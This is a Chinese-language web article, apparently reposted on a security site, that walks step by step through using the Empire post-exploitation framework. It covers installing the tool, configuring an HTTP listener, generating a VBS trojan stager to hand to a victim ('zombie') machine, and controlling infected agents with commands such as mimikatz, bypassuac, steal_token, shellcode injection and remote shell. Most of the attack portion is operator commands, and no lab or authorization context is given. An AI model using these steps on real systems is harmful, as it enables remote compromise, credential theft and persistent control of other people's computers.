安基网 首页 安全 攻防案例 查看内容

我的天,内网渗透,大黑客是这样进行操作的

2020-2-14 15:38| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 1、Empire工具介绍Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有 ...

1、Empire工具介绍

Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中


2、Empire工具安装

虽然渗透的目标是windows,但Empire本身应该是运行在linux平台的,首先把程序目录下载下来:

git clone EmpireProject/Empire

接着就转进”Empire/setup”目录,安装./install.sh。

sudo ./install.sh

3、Empire工具的攻击利用

执行 sudo ./empire #执行工具操作

执行 listeners #进入监听列表

如果出现[!] Invalid listener name 那么先执行 uselistener http 选择http模块 再执行info 即可, 跳出就back


直接命令

set Name hacker

set Host http://192.168.1.14:443


设置完之后:

然后执行: run #运行监听。 运行监听之后生成木马。 如果没有run 命令就用 execute 取代run命令

执行:usestager 空格 然后Tab按键 会出现

bunny ducky hta launcher_bat launcher_vbs pth_wmis stager war dll hop_php launcher launcher_sct macro scrambled_macro teensy


Windows 就选择 launcher_bat launcher_vbs 等。。 PHP 就选择 hop_php

比如我选择: launcher_vbs

执行:usestager launcher_vbs 监听列表的名字 #这里就是hacker, hacker就是我刚刚设置的监听列表名字 (set Listener hacker)

然后执行:info 查看设置配置,木马脚本放在了 /tmp/launcher.vbs

然后执行:execute #运行 生成木马,生成成功 然后执行: sudo chmod 777 /tmp/launcher.vbs #赋予可读可写权限 然后丢给肉鸡运行

生成成功

然后查看肉鸡列表 执行命令: agents PS:如果你exit了 也就是退出了 你也可以直接执行agents命令查看肉鸡列表

如果要控制肉鸡的话:

就执行: interact 肉鸡的名字

进入之后 执行帮助 help 查看 肉鸡控制器的命令

agents 跳跃的代理人的菜单

back 返回菜单

bypassuac 运行bypassuac,开创一个新的高完整性为监听代理。产卵<监听器>

clear 清除代理任务。

creds 从数据库显示/返回凭证。

download 任务代理下载文件

exit 任务代理退出

help 显示菜单或语法for the help特定的命令。

info 显示有关此代理的信息

injectshellcode listener shellcode inject进入偏远的过程。前listener米。injectshellcode<><>_ PID

jobs 返回工作或杀死一个正在运行的工作

kill 任务杀死特定进程名称或ID.的代理

killdate 获取或设置一个代理的killdate(01 / 01 / 2016)。

list 列出所有活动代理(或侦听器)

listeners 跳转到监听器菜单

lostlimit 任务代理更改丢失代理检测的限制

main 回到主菜单

mimikatz 运行在客户端- mimikatz Invoke

psinject inject发射器向远程进程。例如,psinject > <名> < PID

pth 执行一个credid PTH通过Mimikatz。

rename 重命名代理

revtoself 使用凭证/令牌还原令牌权限。

sc 需要截图,默认是PNG。给一个比率意味着使用JPEG。例SC [ 1 ]

scriptcmd 执行在目前进口PowerShell脚本函数。

scriptimport 进口的PowerShell脚本保存在存储器中的代理。

searchmodule 模块搜索帝国名称/描述。

shell 使用shell命令的代理任务。

sleep 任务代理睡眠间隔[抖动]

spawn 对于给定的听众产生一个新的帝国代理名称。产卵<监听器>

steal_token 使用凭据/代币冒充一个令牌的进程ID。

sysinfo 任务获取系统信息的代理

updateprofile 更新代理连接配置文件

upload 任务代理上传文件

usemodule 使用一个帝国的PowerShell模块

workinghours 获取或设置一个代理的工作时间


执行肉鸡命令: shell 你想执行的系统命令

三、结束攻击

如果你想删除肉鸡:

执行:agents #查看肉鸡列表

执行:remove 肉鸡名字

如果你想关闭监听:

首先执行: listeners 查看监听列表

然后执行: kill 监听列表的名字 结束掉进程

最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群。(送免费资料和优惠券)

就会自动分享给你群号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。

还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券!



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6771290062752580108/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部